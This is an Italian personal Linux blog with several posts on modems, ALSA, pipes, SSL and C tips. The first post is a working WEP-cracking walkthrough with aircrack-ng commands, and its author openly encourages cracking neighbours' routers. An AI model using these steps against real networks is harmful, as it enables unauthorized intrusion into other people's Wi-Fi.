packz

Non mi ricordo neanche più perché avevo accattato una scheda wireless PCI per il mio desktop, forse proprio per fare quello che ho fatto e che adesso vi spiegherò.

Prima di tutto non usare i driver che fornirebbe la ralink (che sono closed) ma usate quelli del progetto http://rt2x00.serialmonkey.com, che ormai sono inclusi nel tree del kernel e che nel mio caso corrispondono al modulo rt61pci. La versione del kernel è 2.6.26-1-686, quella del modulo 2.1.4, quella di aircrack-ng è 1:1.0~rc1-2 (tutto su una debian Lenny).

Prima di tutto si passa al modo promiscuo (probabilmente andrà contro i precetti del tuo Dio ma non ti preoccupare, craccheremo anche lui) attraverso il comando

# airmon-ng start wlan0

vi dovreste ritrovare con una bella interfaccia wireless nuova chiamata mon0 (cisti che eseguire più volte il comando crea più interfacce che però non so quanto servano); Per testare se effettivamente il ciocco works usare

# aireplay-ng -9 -i wlan0 mon0

(-9 è l'opzione di testing) e se esce una riga "Injection is working" allora siamo a buon punto; inoltre dovrebbe farvi vedere quali attacchi sono supportati dalla scheda (prossimamente magari un post sulle vulnerabilità del protocollo sarà d'obbligo).

Adesso sniffiamo pacchetti (non la droga ragazzi!!! fa male!!! non fatevi le pere di mariuana): attraverso il comando

# airodump-ng -c <channel> --bssid <MAC AP> -w <file> mon0

si visualizzerà l'access point (AP) e i pacchetti che riuscite a sgamargli. Lasciate il comando attivo e su un altro terminale, agite tramite fake authentication con il comando

# aireplay-ng -1 0 -e <essid> -a <MAC AP> -h  <OUR MAC> mon0

che se va a buon fine allora potete lanciare il comando

# aireplay-ng -3 -b <MAC AP> -h <OUR MAC> mon0

e dovreste vedere nella finestra di airmon-ng i pacchetti "iv" crescere a colpi di 20/s; quando arrivate a circa 250k (a me ci sono volute 3h½) potete tentare con

#aircrack-ng -b <MAC AP> <file>*.cap

e nel caso magicamente troverete la chiave e forse una rete fastweb da 1.1MB/s ;-)

Ovviamente da questa guida non si capisce un cazzo, ma principalmente è un sunto di questa pagina: simple wep crack direttamente dal sito aircrack-ng.org.

P.S: qua dovrei dire che quanto detto è solo a scopo educativo, ma me ne sbatto, se uno usa ancora una chiave WEP nel 2008 un po' se lo merita che gli cracchiate il router NETGEAR a cui neanche ha cambiato la password :-P

Ovviamente dopo aver fatto il bordello descritto qui e qui per rendere usabile quella merda della chiavetta ONDA non si va a spaccare? siccome era disponibile il mitico modem della HUAWEI che funziona paura ed è supportato paura-bis si è optato per riutilizzare questo per far funzionare il collegamento con la TIM (che evidentemente ha fatto una ottima scelta per quanto riguarda le chiavette che non sono supportate benché sulla confezione sia declamato ben altro, e si spaccano subito).

Può sembrare un ossimoro, ma funziona, basta evitare nelle stringhe di inizializzazione l'uso di comandi che capisce solo la chiavetta ONDA (che è una merda ve lo ricordo nel caso qualcuno abbia la malsana idea di fare il contratto con la TIM e prendere questa chiavetta con un sistema GNU/Linux).

Fuori c'è un tempo di merda, non uscirò perché devo studiare siccome voglio diventare un uomo importante, ma prima vi lascio con qualche link di dubbio interesse

Linux al CERN: pare che nei laboratori crea-buchi-neri usino una distribuzione derivata da Red Hat.
Sarah Palin è un Hacker: pare che la vice di Mc Cain se ne intenda di computer oltre che di cazzi.
Firefox=panda rosso: pare che in realtà c'è stata una incomprensione quando è stato chiesto di disegnare il logo di firefox in quanto doveva indicare un panda rosso.
Genera un articolo casuale: da presentare ad una conferenza.

Quello che segue è un esempio di codice in cui viene utilizzato l'output di un programma come input di quello principale; viene utilizzato un sistema di pipe(7) per far comunicare la coppia di processi che si originano in seguito ad una fork(2): in particolare questo programma prende come argomento il nome di un file e ne restituisce il checksum effettuatto attraverso il commando da shell md5sum(1). Il codice lo trovate qui.

Quest'altro invece mette in risalto una caratteristica di un sistema operativo nel trattare i file descriptor, cioè gli indici che internamente vengono usati per tenere conto dei file aperti; i file descriptor sono molto importanti siccome nella filosofia degli Unix è che ogni cosa è vista come un file ed in particolare ogni programma al suo avvio ha almeno tre file descriptor (o stream nella terminologia dell'ANSI C) lo standard input, output ed error. Il problema che si può avere è che chiudendo questi file descriptor all'avvio del programma, un eventuale successiva apertura di un file andrebbe ad occupare quelli che precedentemente erano collegato con gli stream standard citati precedentemente (il sistema restituisce il primo file descriptor libero) e se magari avete una routine di logging che cerca di scrivere su qualche stream che pensa aperto, le conseguenze potrebbero essere belle bastarde. Il codice può farvi capire quello che sto cercando di spiegare.

Allora, visto che sono le 23:00 e sono già stanco senza aver fatto un cazzo se non aver capito che i simplessi rimangono ancora un mistero per me; intanto che manca un mesetto all'HM a palemmo dove spero fortemente di riuscire ad andare ecco qualche bel link di cose trovate in rete

• Hacking di defibrillatori
• Qualche papers su problemi di sicurezza (qualcuno sulla programmazione Php e Javascript)
• La nuova versione di Vim non imposta di default filetype plugin on che quindi va inserito nel proprio file di configurazione (via ml di debian) 
• Qualche talk di Blackhat
• Video di nuove features di blender
• Inventati un brevetto anche tu
• Hitler uomo dell'anno per il Times del '38

Stamattina accendo il computer e sento un suono quasi metallico che ho associato con un eventuale danno all'HD, in realtà era quella merda di alsa che ha impostato lo speaker come prima scheda audio: dando

 $ cat /proc/asound/cards

mi sono ritrovato con

0 [pcsp           ]: PC-Speaker - pcsp
                      Internal PC-Speaker at port 0x61
1 [Intel          ]: HDA-Intel - HDA Intel
                      HDA Intel at 0xdfdf8000 irq 19

per mettere a posto il tutto mettete la riga blacklist snd-pcsp in /etc/modprobe.d/alsa-base-blacklist e date alsa force-reload da superuser e tornate ad ascoltare radio blackout. C'è anche una segnalazione di baco però cita Pulse audio che io non ho neanche installato...

Giornata a base di SSL: volevo scrivere un programma per condividere file con i miei friends direttamente senza passare da chat o cose simile che a colpi di 2KiB/s ci metto un anno a copiarmi i file; inoltre vogliamo mettere la possibilità di creare una connessione criptata con la quale scambiarsi file compromettenti? dopo due giorni di coding selvaggio in cui ho perso la elasticità del cristallino posso condividere questa merda di codice con voi. Il codice è questo (peerssl.tar.gz) decompattate e date make; per usare la versione server dovete creare un certificato chiave privata tramite openssl. Sulla mia debian sono solito eseguire

$ openssl genrsa -out packz-private-key.pem 2048
$ openssl req -new -x509 -key packz-private-key.pem -out packz-certificate.pem -days 1095

Non mi chiedete come si aprono le porte del router che esiste google (anche se io ho un link paura che adesso non ho voglia di cercare).

 Intanto beccatevi una foto dal mio modernissimissimo cellulare fatta sotto i portici della mia angusta città in uno dei pochi momenti di pausa della mia retina

P.S: sono alla seconda lattina di birra di questo fottuto sabato e ho appena ucciso una zanzara di almeno 3cm di raggio che mi svolazzava in casa a colpi di scopa.

Le olimpiadi non è che mi prendano poi così bene, ma rimango colpito come si possano fare certe cose con aste e cose simili (e non sto parlando di film porno). Visto che ho il televisore nell'altra stanza (modello anni 70) ma volevo vedere la ginnastica ritmica (il mio interesse è relativo allo spazio delle configurazioni del sistema in esame) senza dover tralasciare la mia postazione personale; purtroppo il sito della RAI chiede di installare merde winzoz like e quindi con l'energia del sole (google ed mplayer) vincerò. Da un forum scopro gli indirizzi

mms://livestream.rai.it.edgestreams.net/reflector:21533
mms://livestream.rai.it.edgestreams.net/reflector:54836
mms://livestream.rai.it.edgestreams.net/reflector:30773
http://mediapolis.rai.it/relinker/relinkerServlet.htm?cont=4132
mms://livestream.rai.it.edgestreams.net/reflector:59496
http://mediapolis.rai.it/relinker/relinkerServlet.htm?cont=4134
http://mediapolis.rai.it/relinker/relinkerServlet.htm?cont=4135
http://mediapolis.rai.it/relinker/relinkerServlet.htm?cont=4136

e quindi con la giusta cache si può vedere lo sport che è il vero vincitore (non mi chiedete quale indirizzo corrisponda ad un dato canale).

Regole da seguire per scrivere codice in C

1. Appena apri un file (sopratutto non tuo) imposta shiftwidth, tabstop ed eventualmente expandtab in maniera adeguata al tuo stile. Eventualmente set list ti può far capire che impostazioni sono state usate.
2. Il preprocessore ti ha fatto conoscere # e ## che sono tue amiche e ci sanno fare.
3. Ricordati che con -llibrary dici al linker che al programma serve la libreria library e con -L eventualmente dove trovarla. Un controllo con ldd non fa mai male.
4. Commenta il codice
5. Commenta il codice
6. Se hai creato una funzione con più di due blocchi distinti mi sa che ti tocca riscriverla.
7. Ricordati di nascondere con static una funzione al mondo esterno.
8. Non sforare le 80 colonne.
9. Sempre sia lodato ulimit -c unlimited.
10. Quando migliori il codice assicurati di non peggiorarlo.
11. I Makefile sono una figata
12. Se il tuo programma prevede di scrivere su file usa full(4) per provare cosa succede nel caso si esaurisca lo spazio su disco (tu ovviamente credevi di aver pensato a tutto!!!).
13. Le mailing list sono tue amiche (magari leggile tramite thunderbird che ha un eccellente sezione sulla iscrizione ai news groups di gmane.org).
14. Se desideri open(2) ma vim ti apre open(1) ricordati di premere '2K'.
15. If a macro contains more than one statement, use a do/while structure to enclose the
    macro. (Don't forget to leave out the semicolon of the statement).
16. gcc -dM -E - < /dev/null può dirti quali sono le macro predefinite nel tuo compilatore preferito.
17. Puoi impostare un campo di una struct tramite per esempio
    variabile_struct = (struct punto){ .x = 10.0 , .y = 14.89 }; secondo me è più leggibile e anche se cambi la definizione della struct non hai bisogno di cambiare l'ordine delle inizializzazioni (e il compilatore non ti avverte!!!).
18. Usa un regola esplicita nel makefile per gli header: file.o: header.h. Altrimenti nella ricompilazione può usare una struct che in realtà è stata ridefinita e il segfault diventa un mistero.